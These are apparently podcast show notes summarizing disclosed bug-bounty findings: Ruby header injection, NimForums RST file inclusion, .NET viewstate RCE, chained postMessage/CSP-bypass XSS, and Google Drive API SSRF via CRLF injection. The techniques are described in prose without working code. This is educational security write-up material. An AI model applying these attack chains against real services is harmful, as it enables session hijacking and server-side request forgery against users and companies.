Show Notes

117 - Hacking Google Drive Integrations and XSS Puzzles

Maybe an issue, maybe not; the Ruby devs seem to think its a non-issue. This is a case of a library allowing some questionable input. The net/http library provides a set_content_type which takes in the mimetype and a dictionary. The dictionary is just joined and reflected in the final content-type header as a key=value string. An attacker who can control input to that dictionary can include new line characters and inject their own request headers.

This is a significant restriction for an attacker to be sure, however it also makes little sense for Ruby to include newline character at all even if they are passed in. While an actual vulnerability using this is probably a rare situation. It is a bit of a quirk that might pop-up somewhere.

Really straight forward bug, NimForums uses the rather feature-full Restructured Text (RST) format for its user-generated content, which has an include directive that can be used to include local files. What is atleast slightly interesting here is that the code authors seemed aware of the potential vulnerabilities and included a couple comments in relevant code:

The proc is meant to be used in online environments without access to a meaningful filesystem, and therefore rst include like directives won’t work. And in myFindFile another comment indicates: we don’t find any files in online mode: Despite these reassuring comments, the include directive works just fine and files will be found and included. Making matters a bit worse, even an admin who was aware of these risks from RST and who might have disabled the include directive, might have missed the fact that the code-blocks directive was customized to also include files.

I think this is just a nice example of how developers may not always reflect the ground truth of the code they are in. It might be that the code changed since the comment was written or that the intent of the first comment was prescriptive (don’t use when there is access to a meaningful filesystem) rather than descriptive (it won’t access the filesystem).

Once again deserialization and RCE through an unprotected viewstate, its kinda silly that this sort of issue continues to persist. The normal _VIEWSTATE field is used by some .NET applications to contain a ton of information about the current view state. Its rather large, and attackers tampering with it was a very common attack that has since been mitigated through the use of integrity verification. Unfortunately, it continues to persist as some applications, to make the viewstate smaller did their own wrapping around it to enable it to be gzipped to save data.

Those customized implementations did not get the “update” that introduced such fixes and so continue to serve up insecure viewstates ready for attackers to abuse.

We’ve got two XSS “puzzles” in unnamed bounty programs, each with somewhat interesting exploit strategies. The original post is worth a read for more insight into the thought process leading to the discovery of each step.

Puzzle 1

The first puzzle started off with a postMessage handler that did not perform any origin checking. It could be used to set the windows.settingsSync value when the event’s type was ChatSettings. In turn, the settingsSync values were used by some third-party code. Specifically it could be triggered to make what seems like a “refresh settings” sort of request. It would figure out the subdomain for the user’s region, POST to it, use the response as the windows.settingsSync then load a JS file based on the window.settingsSync.versionNumber from cloudfront, and then it would use window.settingsSync.config in an eval(...).

The region domain was based on the window.settingsSync.region so by using the first postMessage issue to change the region to a malicious value, they could have a domain that resolves somewhere attacker controlled. Allowing arbitrary Javascript to be passed into eval. Unfortunately, this was in the context of cloudfront and not the original application.

However the original application did have another postMessage handler, this handler did origin checking, and would trust the cloudfront domain. It would await the IframeLoaded event and then send back a “credentialConfig” which would include sensitive information like the user’s session token, enabling account hijacking.

Puzzle Two

The second puzzle starts off with a bit of a weird oauth setup. The application ones you landed on the company path, it would make a GET request to The returned page contained some of the standard oauth provider data like logourl, name, link. Of interest was the introdunction field which would be directly injected in the page. Enabling XSS if an attacker could control the results.

Of course, an attacker could control the results because the domain used for this GET request was taken from the URL of the original page, the domain query parameter. Unfortunately for the author the page’s Content-Security-Policy (CSP) prevented arbitary page loaded, but did allow the company’s site and * Which is the root domain for a lot of AWS content, like S3 buckets. So an attacker could just host their attack on S3.

There was a second CSP issue, script-src was set to self or * To get around this restriction, they utilized an open redirect on the company site. The site would ensure that the provided URL ended with the problem was that it allowed new-line characters, which browsers would treat a bit differently. By including a url encoded new-line character (%0a) in the subdomain, the browser would send the request off the to domain before the newline and the newline and the rest would be part of the path. Resulting again in XSS.

The interesting part of this post is the utilization of an external API to result in SSRF, specifically the Google Drive API.

It takes advantage of the fact that the API by default returns a JSON payload that includes downloadURL that users of the API would then request to download the file itself. However, if one can include the alt=media query parameter and value in the request, rather than serving the metadata it would serve the file content itself. Allowing an attacker to control the downloadURL which applications would trust by serving a file containing the relevant JSON.

First Finding - Partial SSRF in Private Bounty

In this private application, the fileId field could be abused for path traversal on the Drive API to hit other API endpoints, but the main issue was a CRLF Injection in the Authorization header as it would inject the attacker controlled authorization token into that header. This was abused to inject two blank lines leading the Google Server into thinking it was a second request, where the attacker then controlled the entire request and could do the alt=media trick.

The result was an SSRF however as the downloaded file was parsed as a PPTX the full contents could not be read.

Second Finding - Full-Read SSRF

We are not provided a lot of details here, just a link to the HackerOne report. Though I think the summary gives you a good idea of what happened.

This researcher pointed out that HelloSign’s Google Drive doc export feature had a URL parsing issue that could allow extra parameters to be passed to Google Drive API.